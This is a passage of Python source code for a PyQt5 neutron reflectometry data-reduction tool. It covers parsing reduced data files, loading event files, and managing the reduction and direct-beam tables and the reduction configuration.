conf.bck_position = float(toks[8])
conf.bck_width = float(toks[9])
conf.direct_pixel_overwrite = float(toks[10])
run_number = int(toks[12])
run_file = toks[-1]
# This application only deals with event data, to be able to load
# reduced files created with histo nexus files, we have to
# use the corresponding event file instead.
# Similarly, the number of points cut on each side probably
# doesn't make sense, so reset those options.
if run_file.endswith('histo.nxs'):
run_file = run_file.replace('histo.', 'event.')
#conf.cut_first_n_points = 0
#conf.cut_last_n_points = 0
# Catch data files meant for QuickNXS and use the raw file instead
run_file = _find_h5_data(run_file)
direct_beam_runs.append([run_number, run_file, conf])
except:
logging.error("Could not parse reduced data file:\n %s", sys.exc_info()[1])
logging.error(line)
# Process data runs
if _in_section == 2:
toks = line.split()
if len(toks) < 16 or 'DB_ID' in line:
continue
try:
if configuration is not None:
conf = copy.deepcopy(configuration)
else:
conf = Configuration()
conf.scaling_factor = float(toks[1])
conf.cut_first_n_points = int(toks[2])
conf.cut_last_n_points = int(toks[3])
conf.peak_position = float(toks[4])
conf.peak_width = float(toks[5])
conf.low_res_position = float(toks[6])
conf.low_res_width = float(toks[7])
conf.bck_position = float(toks[8])
conf.bck_width = float(toks[9])
conf.use_constant_q = toks[10].strip().lower() == 'true'
conf.direct_pixel_overwrite = float(toks[11])
if int(toks[14]) > 0 and len(direct_beam_runs) > int(toks[14])-1:
conf.normalization = direct_beam_runs[int(toks[14])-1][0]
run_number = int(toks[13])
run_file = toks[-1]
if run_file.endswith('histo.nxs'):
run_file = run_file.replace('histo.', 'event.')
#conf.cut_first_n_points = 0
#conf.cut_last_n_points = 0
run_file = _find_h5_data(run_file)
data_runs.append([run_number, run_file, conf])
except:
logging.error("Could not parse reduced data file:\n %s", sys.exc_info()[1])
logging.error(line)
# Options
if _in_section == 3:
if line.startswith("# sample_length"):
try:
conf.sample_size = float((line[len("# sample_length"):]).strip())
except:
logging.error("Could not extract sample size: %s" % line)
return direct_beam_runs, data_runs
```
#### File: interfaces/event_handlers/main_handler.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
import os
import logging
import glob
import math
import time
from PyQt5 import QtGui, QtCore, QtWidgets
from ..configuration import Configuration
from .progress_reporter import ProgressReporter
class MainHandler(object):
"""
Event handler for the main application window.
"""
def __init__(self, main_window):
self.ui = main_window.ui
self.main_window = main_window
self._data_manager = main_window.data_manager
# Update file list when changes are made
self._path_watcher = QtCore.QFileSystemWatcher([self._data_manager.current_directory],
self.main_window)
self._path_watcher.directoryChanged.connect(self.update_file_list)
self.cache_indicator = QtWidgets.QLabel("Files loaded: 0")
self.cache_indicator.setMargin(5)
self.cache_indicator.setSizePolicy(QtWidgets.QSizePolicy.Fixed,
QtWidgets.QSizePolicy.Preferred)
self.cache_indicator.setMinimumWidth(110)
self.ui.statusbar.addPermanentWidget(self.cache_indicator)
button = QtWidgets.QPushButton('Empty Cache')
self.ui.statusbar.addPermanentWidget(button)
button.pressed.connect(self.empty_cache)
button.setFlat(True)
button.setMaximumSize(150, 20)
# Create progress bar in statusbar
self.progress_bar = QtWidgets.QProgressBar(self.ui.statusbar)
self.progress_bar.setMinimumSize(20, 14)
self.progress_bar.setMaximumSize(140, 100)
self.ui.statusbar.addPermanentWidget(self.progress_bar)
self.status_message = QtWidgets.QLabel("")
self.status_message.setMinimumWidth(1000)
self.status_message.setMargin(5)
self.ui.statusbar.insertWidget(0, self.status_message)
def new_progress_reporter(self):
""" Return a progress reporter """
return ProgressReporter(progress_bar=self.progress_bar, status_bar=self.status_message)
def empty_cache(self):
"""
Empty the data cache
"""
self._data_manager.clear_cache()
self.cache_indicator.setText("Files loaded: 0")
def open_file(self, file_path, force=False, silent=False):
"""
Read a data file
:param str file_path: file path
:param bool force: if true, the file will be reloaded
:param bool silent: if true, the UI will not be updated
"""
if not os.path.isfile(file_path):
self.report_message("File does not exist",
detailed_message="The following file does not exist:\n %s" % file_path,
pop_up=True, is_error=True)
return
t_0 = time.time()
self.main_window.auto_change_active = True
try:
self.report_message("Loading file %s" % file_path)
prog = ProgressReporter(progress_bar=self.progress_bar, status_bar=self.status_message)
configuration = self.get_configuration()
self._data_manager.load(file_path, configuration, force=force, progress=prog)
self.report_message("Loaded file %s" % self._data_manager.current_file_name)
except:
self.report_message("Error loading file %s" % self._data_manager.current_file_name,
detailed_message=str(sys.exc_value), pop_up=False, is_error=True)
if not silent:
self.file_loaded()
self.main_window.auto_change_active = False
logging.info("DONE: %s sec", time.time()-t_0)
def file_loaded(self):
"""
Update UI after a file is loaded
"""
self.main_window.auto_change_active = True
current_channel = 0
for i in range(12):
if getattr(self.ui, 'selectedChannel%i'%i).isChecked():
current_channel = i
success = self._data_manager.set_channel(current_channel)
if not success:
self.ui.selectedChannel0.setChecked(True)
channels = self._data_manager.data_sets.keys()
for i, channel in enumerate(channels):
getattr(self.ui, 'selectedChannel%i'%i).show()
good_label = channel.replace('_', '-')
if not good_label == self._data_manager.data_sets[channel].cross_section_label:
good_label = "%s: %s" % (good_label, self._data_manager.data_sets[channel].cross_section_label)
getattr(self.ui, 'selectedChannel%i'%i).setText(good_label)
for i in range(len(channels), 12):
getattr(self.ui, 'selectedChannel%i'%i).hide()
self.main_window.auto_change_active = False
self.main_window.file_loaded_signal.emit()
self.main_window.initiate_reflectivity_plot.emit(False)
self.main_window.initiate_projection_plot.emit(False)
self.cache_indicator.setText('Files loaded: %s' % (self._data_manager.get_cachesize()))
def update_tables(self):
"""
Update a data set that may be in the reduction table or the
direct beam table.
"""
# Update the reduction table if this data set is in it
idx = self._data_manager.find_active_data_id()
if idx is not None:
self.update_reduction_table(idx, self._data_manager.active_channel)
# Update the direct beam table if this data set is in it
idx = self._data_manager.find_active_direct_beam_id()
if idx is not None:
self.update_direct_beam_table(idx, self._data_manager.active_channel)
def update_calculated_data(self):
"""
Update the calculated entries in the overview tab.
We should call this after the peak ranges change, or
after a change is made that will affect the displayed results.
"""
d = self._data_manager.active_channel
self.ui.datasetAi.setText(u"%.3f°"%(d.scattering_angle))
wl_min, wl_max = d.wavelength_range
self.ui.datasetLambda.setText(u"%.2f (%.2f-%.2f) Å"%(d.lambda_center,
wl_min, wl_max))
# DIRPIX and DANGLE0 overwrite
if self.ui.set_dangle0_checkbox.isChecked():
dangle0 = u"%.3f° (%.3f°)" % (float(self.ui.dangle0Overwrite.text()), d._angle_offset)
else:
dangle0 = u"%.3f°"%(d.angle_offset)
self.ui.datasetDangle0.setText(dangle0)
if self.ui.set_dirpix_checkbox.isChecked():
dpix = u"%.1f (%.1f)" % (float(self.ui.directPixelOverwrite.value()), d._direct_pixel)
else:
dpix = u"%.1f"%d.direct_pixel
self.ui.datasetDirectPixel.setText(dpix)
if d.configuration.normalization is not None:
self.ui.matched_direct_beam_label.setText(u"%s" % d.configuration.normalization)
else:
self.ui.matched_direct_beam_label.setText(u"None")
def update_info(self):
"""
Update metadata shown in the overview tab.
"""
self.main_window.auto_change_active = True
d = self._data_manager.active_channel
self.populate_from_configuration(d.configuration)
self.main_window.initiate_projection_plot.emit(False)
QtWidgets.QApplication.instance().processEvents()
if self.ui.set_dangle0_checkbox.isChecked():
dangle0 = u"%.3f° (%.3f°)" % (float(self.ui.dangle0Overwrite.text()), d.angle_offset)
else:
dangle0 = u"%.3f°"%(d.angle_offset)
if self.ui.set_dirpix_checkbox.isChecked():
dpix = u"%.1f (%.1f)" % (float(self.ui.directPixelOverwrite.value()), d.direct_pixel)
else:
dpix = u"%.1f"%d.direct_pixel
wl_min, wl_max = d.wavelength_range
self.ui.datasetLambda.setText(u"%.2f (%.2f-%.2f) Å"%(d.lambda_center,
wl_min, wl_max))
self.ui.datasetPCharge.setText(u"%.3e"%d.proton_charge)
self.ui.datasetTime.setText(u"%i s"%d.total_time)
self.ui.datasetTotCounts.setText(u"%.4e"%d.total_counts)
try:
self.ui.datasetRate.setText(u"%.1f cps"%(d.total_counts/d.total_time))
except ZeroDivisionError:
self.ui.datasetRate.setText(u"NaN")
self.ui.datasetDangle.setText(u"%.3f°"%d.dangle)
self.ui.datasetDangle0.setText(dangle0)
self.ui.datasetSangle.setText(u"%.3f°"%d.sangle)
self.ui.datasetDirectPixel.setText(dpix)
self.ui.currentChannel.setText('<b>%s</b> (%s) Type: %s Current State: <b>%s</b>'%(d.number, d.experiment,
d.measurement_type, d.name))
# Update direct beam indicator
if d.is_direct_beam:
self.ui.is_direct_beam_label.setText(u"Direct beam")
else:
self.ui.is_direct_beam_label.setText(u"")
# Update the calculated data
self.update_calculated_data()
self.ui.roi_used_label.setText(u"%s" % d.use_roi_actual)
self.ui.roi_peak_label.setText(u"%s" % str(d.meta_data_roi_peak))
self.ui.roi_bck_label.setText(u"%s" % str(d.meta_data_roi_bck))
# Update reduction tables
self.update_tables()
self.active_data_changed()
self.main_window.auto_change_active = False
def update_file_list(self, file_path=None):
"""
Update the list of data files
"""
self.main_window.auto_change_active = True
if file_path is not None and not file_path==self._data_manager.current_directory:
if os.path.isdir(file_path):
file_dir = file_path
else:
file_dir, file_name = os.path.split(unicode(file_path))
self._data_manager.current_file_name = file_name
self.main_window.settings.setValue('current_directory', file_dir)
self._path_watcher.removePath(self._data_manager.current_directory)
self._data_manager.current_directory = file_dir
self._path_watcher.addPath(self._data_manager.current_directory)
# Update the list of files
event_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*event.nxs'))
h5_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*.nxs.h5'))
event_file_list.extend(h5_file_list)
event_file_list.sort()
event_file_list = [os.path.basename(name) for name in event_file_list]
current_list = [self.ui.file_list.item(i).text() for i in range(self.ui.file_list.count())]
if event_file_list != current_list:
self.ui.file_list.clear()
for item in event_file_list:
listitem = QtWidgets.QListWidgetItem(item, self.ui.file_list)
if item == self._data_manager.current_file_name:
self.ui.file_list.setCurrentItem(listitem)
else:
try:
self.ui.file_list.setCurrentRow(event_file_list.index(self._data_manager.current_file_name))
except ValueError:
self.report_message("Could not set file selection: %s" % self._data_manager.current_file_name,
detailed_message=str(sys.exc_value), pop_up=False, is_error=True)
self.main_window.auto_change_active = False
def automated_file_selection(self):
"""
Go through the files in the current in order of run numbers, and
load files until the incident angle is no longer increasing.
"""
self.main_window.auto_change_active = True
# Update the list of files
event_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*event.nxs'))
h5_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*.nxs.h5'))
event_file_list.extend(h5_file_list)
event_file_list.sort()
event_file_list = [os.path.basename(name) for name in event_file_list]
current_file_found = False
n_count = 0
logging.error("Current file: %s", self._data_manager.current_file_name)
q_current = self._data_manager.extract_meta_data().mid_q
# Add the current data set to the reduction table
# Do nothing if the data is incompatible
is_direct_beam = self._data_manager.active_channel.is_direct_beam
if is_direct_beam:
if not self.add_direct_beam():
return
else:
if not self.add_reflectivity():
return
for f in event_file_list:
file_path = str(os.path.join(self._data_manager.current_directory, f))
if current_file_found and n_count < 10:
n_count += 1
meta_data = self._data_manager.extract_meta_data(file_path)
if q_current <= meta_data.mid_q and is_direct_beam == meta_data.is_direct_beam:
q_current = meta_data.mid_q
self.open_file(file_path, silent=True)
d = self._data_manager.active_channel
# If we find data of another type, stop here
if not is_direct_beam == self._data_manager.active_channel.is_direct_beam:
break
self.main_window.auto_change_active = True
self.populate_from_configuration(d.configuration)
if self._data_manager.active_channel.is_direct_beam:
self.add_direct_beam()
else:
self.add_reflectivity()
if f == self._data_manager.current_file_name:
current_file_found = True
# At the very end, update the UI and plot reflectivity
if n_count > 0:
self.main_window.auto_change_active = True
self.file_loaded()
self.main_window.auto_change_active = False
def open_reduced_file_dialog(self):
"""
Open a reduced file and all the data files needed to reproduce it.
"""
# Open file dialog
filter_ = u'QuickNXS files (*.dat);;All (*.*)'
output_dir = self.main_window.settings.value('output_directory', os.path.expanduser('~'))
file_path, _ = QtWidgets.QFileDialog.getOpenFileName(self.main_window, u'Open reduced file...',
directory=output_dir,
filter=filter_)
t_0 = time.time()
if file_path:
# Clear the reduction list first so that we don't create problems later
self.clear_direct_beams()
self.clear_reflectivity()
configuration = self.get_configuration()
prog = self.new_progress_reporter()
self._data_manager.load_data_from_reduced_file(file_path, configuration=configuration,
progress=prog)
# Update output directory
file_dir, _ = os.path.split(unicode(file_path))
self.main_window.settings.setValue('output_directory', file_dir)
self.main_window.auto_change_active = True
self.ui.normalizeTable.setRowCount(len(self._data_manager.direct_beam_list))
for idx, _ in enumerate(self._data_manager.direct_beam_list):
self._data_manager.set_active_data_from_direct_beam_list(idx)
self.update_direct_beam_table(idx, self._data_manager.active_channel)
self.ui.reductionTable.setRowCount(len(self._data_manager.reduction_list))
for idx, _ in enumerate(self._data_manager.reduction_list):
self._data_manager.set_active_data_from_reduction_list(idx)
self.update_reduction_table(idx, self._data_manager.active_channel)
direct_beam_ids = [str(r.number) for r in self._data_manager.direct_beam_list]
self.ui.normalization_list_label.setText(u", ".join(direct_beam_ids))
self.file_loaded()
if self._data_manager.active_channel is not None:
self.populate_from_configuration(self._data_manager.active_channel.configuration)
self.update_file_list(self._data_manager.current_file)
self.main_window.auto_change_active = False
logging.info("UI updated: %s", time.time()-t_0)
# Actions defined in Qt Designer
def file_open_dialog(self):
"""
Show a dialog to open a new file.
TODO: consider multiple selection. In this case QuickNXS tries to automatically sort and reduce.
"""
if self.ui.histogramActive.isChecked():
filter_ = u'All (*.*);;histo.nxs (*histo.nxs)'
else:
filter_ = u'All (*.*);;nxs.h5 (*nxs.h5);;event.nxs (*event.nxs)'
file_path, _ = QtWidgets.QFileDialog.getOpenFileName(self.main_window, u'Open NXS file...',
directory=self._data_manager.current_directory,
filter=filter_)
if file_path:
self.update_file_list(file_path)
self.open_file(file_path)
def open_run_number(self, number=None):
"""
Open a data file by typing a run number
"""
self.main_window.auto_change_active = True
if number is None:
number = self.ui.numberSearchEntry.text()
QtWidgets.QApplication.instance().processEvents()
# Look for new-style nexus file name
configuration = self.get_configuration()
search_string = configuration.instrument.file_search_template % number
file_list = glob.glob(search_string+'.nxs.h5')
# Look for old-style nexus file name
if not file_list:
search_string = configuration.instrument.legacy_search_template % number
file_list = glob.glob(search_string+'_event.nxs')
self.ui.numberSearchEntry.setText('')
success = False
if file_list > 0:
self.update_file_list(file_list[0])
self.open_file(os.path.abspath(file_list[0]))
success = True
else:
self.report_message("Could not locate file %s" % number, pop_up=True)
self.main_window.auto_change_active = False
return success
def update_daslog(self):
"""
Write parameters from all file daslogs to the table in the
daslog tab.
"""
table = self.ui.daslogTableBox
table.setRowCount(0)
table.sortItems(-1)
table.setColumnCount(len(self._data_manager.data_sets)+2)
table.setHorizontalHeaderLabels(['Name']+self._data_manager.data_sets.keys()+['Unit'])
for j, key in enumerate(sorted(self._data_manager.active_channel.logs.keys(), key=lambda s: s.lower())):
table.insertRow(j)
table.setItem(j, 0, QtWidgets.QTableWidgetItem(key))
table.setItem(j, len(self._data_manager.data_sets)+1,
QtWidgets.QTableWidgetItem(self._data_manager.active_channel.log_units[key]))
i = 0
for xs in self._data_manager.data_sets:
item = QtWidgets.QTableWidgetItem(u'%g' % self._data_manager.data_sets[xs].logs[key])
item.setToolTip(u'MIN: %g MAX: %g' % (self._data_manager.data_sets[xs].log_minmax[key]))
table.setItem(j, i+1, item)
i += 1
table.resizeColumnsToContents()
def add_reflectivity(self, silent=False):
"""
Collect information about the current extraction settings and store them
in the list of reduction items.
Returns true if everything is ok, false otherwise.
"""
# Update the configuration according to current parameters
# Note that when a data set is first loaded, the peaks may have a different
# range for each cross-section. If the option to use a common set of ranges
# was turned on, we pick the ranges from the currently active cross-section
# and apply then to all cross-sections.
if self.ui.action_use_common_ranges.isChecked():
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
# Verify that the new data is consistent with existing data in the table
if not self._data_manager.add_active_to_reduction():
if not silent:
self.report_message("Data incompatible or already in the list.", pop_up=True)
return False
self.main_window.auto_change_active = True
# Update the reduction and direct beam tables
idx = self._data_manager.find_data_in_reduction_list(self._data_manager._nexus_data)
self.ui.reductionTable.insertRow(idx)
self.update_tables()
self.main_window.initiate_reflectivity_plot.emit(True)
self.main_window.update_specular_viewer.emit()
self.main_window.auto_change_active = False
return True
def update_reduction_table(self, idx, d):
"""
Update the reduction tale
"""
self.main_window.auto_change_active = True
item = QtWidgets.QTableWidgetItem(str(d.number))
if d == self._data_manager.active_channel:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
item.setFlags(item.flags() & ~QtCore.Qt.ItemIsEditable)
self.ui.reductionTable.setItem(idx, 0, item)
self.ui.reductionTable.setItem(idx, 1,
QtWidgets.QTableWidgetItem("%.4f"%(d.configuration.scaling_factor)))
self.ui.reductionTable.setItem(idx, 2,
QtWidgets.QTableWidgetItem(str(d.configuration.cut_first_n_points)))
self.ui.reductionTable.setItem(idx, 3,
QtWidgets.QTableWidgetItem(str(d.configuration.cut_last_n_points)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.peak_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.reductionTable.setItem(idx, 4, item)
self.ui.reductionTable.setItem(idx, 5,
QtWidgets.QTableWidgetItem(str(d.configuration.peak_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.low_res_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.reductionTable.setItem(idx, 6, item)
self.ui.reductionTable.setItem(idx, 7,
QtWidgets.QTableWidgetItem(str(d.configuration.low_res_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.bck_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.reductionTable.setItem(idx, 8, item)
self.ui.reductionTable.setItem(idx, 9,
QtWidgets.QTableWidgetItem(str(d.configuration.bck_width)))
self.ui.reductionTable.setItem(idx, 10,
QtWidgets.QTableWidgetItem(str(d.direct_pixel)))
self.ui.reductionTable.setItem(idx, 11,
QtWidgets.QTableWidgetItem("%.4f"%d.scattering_angle))
norma = 'none'
if d.configuration.normalization is not None:
norma = d.configuration.normalization
self.ui.reductionTable.setItem(idx, 12,
QtWidgets.QTableWidgetItem(str(norma)))
self.main_window.auto_change_active = False
def clear_reflectivity(self):
"""
Remove all items from the reduction list.
"""
self._data_manager.reduction_list = []
self.ui.reductionTable.setRowCount(0)
self.main_window.initiate_reflectivity_plot.emit(False)
def clear_direct_beams(self):
"""
Remove all items from the direct beam list.
"""
self._data_manager.clear_direct_beam_list()
self.ui.normalizeTable.setRowCount(0)
self.ui.normalization_list_label.setText(u"None")
self.main_window.initiate_reflectivity_plot.emit(False)
def remove_reflectivity(self):
"""
Remove one item from the reduction list.
"""
index = self.ui.reductionTable.currentRow()
if index < 0:
return
self._data_manager.reduction_list.pop(index)
self.ui.reductionTable.removeRow(index)
self.main_window.initiate_reflectivity_plot.emit(False)
def remove_direct_beam(self):
"""
Remove one item from the direct beam list.
"""
index = self.ui.normalizeTable.currentRow()
if index < 0:
return
self._data_manager.direct_beam_list.pop(index)
self.ui.normalizeTable.removeRow(index)
self.main_window.initiate_reflectivity_plot.emit(False)
def reduction_table_changed(self, item):
'''
Perform action upon change in data reduction list.
'''
if self.main_window.auto_change_active:
return
entry = item.row()
column = item.column()
refl = self._data_manager.reduction_list[entry]
#TODO: If we changed the normalization run, make sure it's in the list
# of direct beams we know about.
keys = ['number', 'scaling_factor', 'cut_first_n_points', 'cut_last_n_points',
'peak_position', 'peak_width', 'low_res_position', 'low_res_width',
'bck_position', 'bck_width', 'direct_pixel', 'scattering_angle', 'normalization']
# Update settings from selected option
if column in [1, 4, 5, 6, 7, 8, 9, 10]:
refl.set_parameter(keys[column], float(item.text()))
elif column in [2, 3]:
refl.set_parameter(keys[column], int(item.text()))
elif column == 12:
try:
refl.set_parameter(keys[column], item.text())
except:
refl.set_parameter(keys[column], None)
item.setText("none")
# Update calculated data
refl.update_calculated_values()
# If the changed data set is the active data, also change the UI
if self._data_manager.is_active(refl):
self.main_window.auto_change_active = True
self.update_info()
self.main_window.auto_change_active = False
# Update the direct beam table if this data set is in it
idx = self._data_manager.find_data_in_direct_beam_list(refl)
if idx is not None:
channels = refl.cross_sections.keys()
self.update_direct_beam_table(idx, refl.cross_sections[channels[0]])
# Only recalculate if we need to, otherwise just replot
if not column in [1, 2, 3]:
try:
self._data_manager.calculate_reflectivity(nexus_data=refl)
except:
self.report_message("Could not compute reflectivity for %s" % self._data_manager.current_file_name,
detailed_message=str(sys.exc_value), pop_up=False, is_error=False)
self.main_window.initiate_reflectivity_plot.emit(True)
self.main_window.update_specular_viewer.emit()
def add_direct_beam(self, silent=False):
"""
Add / remove dataset to the available normalizations or clear the normalization list.
"""
# Update all cross-section parameters as needed.
if self.ui.action_use_common_ranges.isChecked():
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
# Verify that the new data is consistent with existing data in the table
if not self._data_manager.add_active_to_normalization():
if not silent:
self.report_message("Data incompatible or already in the list.", pop_up=True)
return False
self.ui.normalizeTable.setRowCount(len(self._data_manager.direct_beam_list))
self.update_tables()
direct_beam_ids = [str(r.number) for r in self._data_manager.direct_beam_list]
self.ui.normalization_list_label.setText(u", ".join(direct_beam_ids))
self.main_window.initiate_reflectivity_plot.emit(False)
return True
def update_direct_beam_table(self, idx, d):
"""
Update a direct beam table entry
:param int idx: row index
:param CrossSectionData d: data object
"""
self.main_window.auto_change_active = True
item = QtWidgets.QTableWidgetItem(str(d.number))
item.setFlags(item.flags() & ~QtCore.Qt.ItemIsEditable)
if d == self._data_manager.active_channel:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
self.ui.normalizeTable.setItem(idx, 0, QtWidgets.QTableWidgetItem(item))
wl = u"%s - %s" % (d.wavelength[0], d.wavelength[-1])
self.ui.normalizeTable.setItem(idx, 7, QtWidgets.QTableWidgetItem(wl))
item = QtWidgets.QTableWidgetItem(str(d.configuration.peak_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.normalizeTable.setItem(idx, 1, QtWidgets.QTableWidgetItem(item))
self.ui.normalizeTable.setItem(idx, 2, QtWidgets.QTableWidgetItem(str(d.configuration.peak_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.low_res_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.normalizeTable.setItem(idx, 3, QtWidgets.QTableWidgetItem(item))
self.ui.normalizeTable.setItem(idx, 4, QtWidgets.QTableWidgetItem(str(d.configuration.low_res_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.bck_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.normalizeTable.setItem(idx, 5, QtWidgets.QTableWidgetItem(item))
self.ui.normalizeTable.setItem(idx, 6, QtWidgets.QTableWidgetItem(str(d.configuration.bck_width)))
self.main_window.auto_change_active = False
def active_data_changed(self):
"""
Actions to be taken once the active data set has changed
"""
# If we update an entry, it's because that data is currently active.
# Highlight it and un-highlight the other ones.
self.main_window.auto_change_active = True
idx = self._data_manager.find_active_data_id()
for i in range(self.ui.reductionTable.rowCount()):
item = self.ui.reductionTable.item(i, 0)
if item is not None:
if i == idx:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
idx = self._data_manager.find_active_direct_beam_id()
for i in range(self.ui.normalizeTable.rowCount()):
item = self.ui.normalizeTable.item(i, 0)
if item is not None:
if i == idx:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
self.main_window.auto_change_active = False
def compute_offspec_on_change(self, force=False):
"""
Compute off-specular as needed
"""
prog = self.new_progress_reporter()
has_changed_values = self.check_region_values_changed()
offspec_data_exists = self._data_manager.is_offspec_available()
logging.info("Exists %s %s", has_changed_values, offspec_data_exists)
if force or has_changed_values>=0 or not offspec_data_exists:
logging.info("Updating....")
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
self._data_manager.reduce_offspec(progress=prog)
def compute_gisans_on_change(self, force=False, active_only=True):
"""
Compute GISANS as needed
"""
prog = self.new_progress_reporter()
has_changed_values = self.check_region_values_changed()
gisans_data_exists = self._data_manager.is_gisans_available(active_only=active_only)
logging.info("Exists %s %s %s", force, has_changed_values, gisans_data_exists)
if force or has_changed_values>=0 or not gisans_data_exists:
logging.info("Updating....")
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
if active_only:
self._data_manager.calculate_gisans(progress=prog)
else:
self._data_manager.reduce_gisans(active_only=active_only, progress=prog)
def check_region_values_changed(self):
"""
Return true if any of the parameters tied to a particular slot
has changed.
Some parameters are tied to the changeRegionValues() slot.
There are time-consuming actions that we only want to take
if those values actually changed, as opposed to the use simply
clicking outside the box.
Some parameters don't require a recalculation but simply a
refreshing of the plots. Those are parameters such as scaling
factors or the number of points clipped.
Return values:
-1 = no valid change
0 = replot needed
1 = recalculation needed
"""
if self._data_manager.active_channel is None:
return -1
configuration = self._data_manager.active_channel.configuration
valid_change = False
replot_change = False
# ROI parameters
x_pos = self.ui.refXPos.value()
x_width = self.ui.refXWidth.value()
y_pos = self.ui.refYPos.value()
y_width = self.ui.refYWidth.value()
bck_pos = self.ui.bgCenter.value()
bck_width = self.ui.bgWidth.value()
valid_change = valid_change or \
not configuration.peak_position == x_pos or \
not configuration.peak_width == x_width
valid_change = valid_change or \
not configuration.low_res_position == y_pos or \
not configuration.low_res_width == y_width
valid_change = valid_change or \
not configuration.bck_position == bck_pos or \
not configuration.bck_width == bck_width
try:
scale = math.pow(10.0, self.ui.refScale.value())
except:
scale = 1
replot_change = replot_change or \
not configuration.scaling_factor == scale
replot_change = replot_change or \
not configuration.cut_first_n_points == self.ui.rangeStart.value()
replot_change = replot_change or \
not configuration.cut_last_n_points == self.ui.rangeEnd.value()
valid_change = valid_change or \
not configuration.subtract_background == self.ui.bgActive.isChecked()
valid_change = valid_change or \
not configuration.use_constant_q == self.ui.fanReflectivity.isChecked()
valid_change = valid_change or \
not configuration.use_dangle == self.ui.trustDANGLE.isChecked()
valid_change = valid_change or \
not configuration.set_direct_pixel == self.ui.set_dirpix_checkbox.isChecked()
valid_change = valid_change or \
not configuration.set_direct_angle_offset == self.ui.set_dangle0_checkbox.isChecked()
if configuration.set_direct_pixel:
valid_change = valid_change or \
not configuration.direct_pixel_overwrite == self.ui.directPixelOverwrite.value()
if configuration.set_direct_angle_offset:
valid_change = valid_change or \
not configuration.direct_angle_offset_overwrite == self.ui.dangle0Overwrite.value()
# Final rebin
valid_change = valid_change or \
not configuration.do_final_rebin == self.ui.final_rebin_checkbox.isChecked()
valid_change = valid_change or \
not configuration.final_rebin_step == self.ui.q_rebin_spinbox.value()
if valid_change:
return 1
if replot_change:
return 0
return -1
def get_configuration(self):
"""
Gather the reduction options.
"""
if self._data_manager.active_channel is not None:
configuration = self._data_manager.active_channel.configuration
else:
configuration = Configuration(self.main_window.settings)
configuration.tof_bins = self.ui.eventTofBins.value()
configuration.tof_bin_type = self.ui.eventBinMode.currentIndex()
configuration.use_roi = self.ui.use_roi_checkbox.isChecked()
configuration.update_peak_range = self.ui.fit_within_roi_checkbox.isChecked()
configuration.use_roi_bck = self.ui.use_bck_roi_checkbox.isChecked()
# Default ranges, using the current values
x_pos = self.ui.refXPos.value()
x_width = self.ui.refXWidth.value()
y_pos = self.ui.refYPos.value()
y_width = self.ui.refYWidth.value()
bck_pos = self.ui.bgCenter.value()
bck_width = self.ui.bgWidth.value()
configuration.peak_position = x_pos
configuration.peak_width = x_width
configuration.low_res_position = y_pos
configuration.low_res_width = y_width
configuration.bck_position = bck_pos
configuration.bck_width = bck_width
configuration.force_peak_roi = not self.ui.actionAutomaticXPeak.isChecked()
configuration.force_low_res_roi = not self.ui.actionAutoYLimits.isChecked()
configuration.match_direct_beam = self.ui.actionAutoNorm.isChecked()
# Use background on each side of the peak
configuration.use_tight_bck = self.ui.use_side_bck_checkbox.isChecked()
configuration.bck_offset = self.ui.side_bck_width.value()
# Other reduction options
configuration.subtract_background = self.ui.bgActive.isChecked()
try:
scale = math.pow(10.0, self.ui.refScale.value())
except:
scale = 1
configuration.scaling_factor = scale
configuration.cut_first_n_points = self.ui.rangeStart.value()
configuration.cut_last_n_points = self.ui.rangeEnd.value()
configuration.normalize_to_unity = self.ui.normalize_to_unity_checkbox.isChecked()
configuration.total_reflectivity_q_cutoff = self.ui.normalization_q_cutoff_spinbox.value()
configuration.wl_bandwidth = self.ui.bandwidth_spinbox.value()
configuration.use_constant_q = self.ui.fanReflectivity.isChecked()
configuration.use_dangle = self.ui.trustDANGLE.isChecked()
configuration.set_direct_pixel = self.ui.set_dirpix_checkbox.isChecked()
configuration.set_direct_angle_offset = self.ui.set_dangle0_checkbox.isChecked()
configuration.direct_pixel_overwrite = self.ui.directPixelOverwrite.value()
configuration.direct_angle_offset_overwrite = self.ui.dangle0Overwrite.value()
configuration.sample_size = self.ui.sample_size_spinbox.value()
configuration.do_final_rebin = self.ui.final_rebin_checkbox.isChecked()
configuration.final_rebin_step = self.ui.q_rebin_spinbox.value()
# UI elements
configuration.normalize_x_tof = self.ui.normalizeXTof.isChecked()
configuration.x_wl_map = self.ui.xLamda.isChecked()
configuration.angle_map = self.ui.tthPhi.isChecked()
configuration.log_1d = self.ui.logarithmic_y.isChecked()
configuration.log_2d = self.ui.logarithmic_colorscale.isChecked()
# Off-specular options
if self.ui.kizmkfzVSqz.isChecked():
configuration.off_spec_x_axis = Configuration.DELTA_KZ_VS_QZ
elif self.ui.qxVSqz.isChecked():
configuration.off_spec_x_axis = Configuration.QX_VS_QZ
else:
configuration.off_spec_x_axis = Configuration.KZI_VS_KZF
configuration.off_spec_slice = self.ui.offspec_slice_checkbox.isChecked()
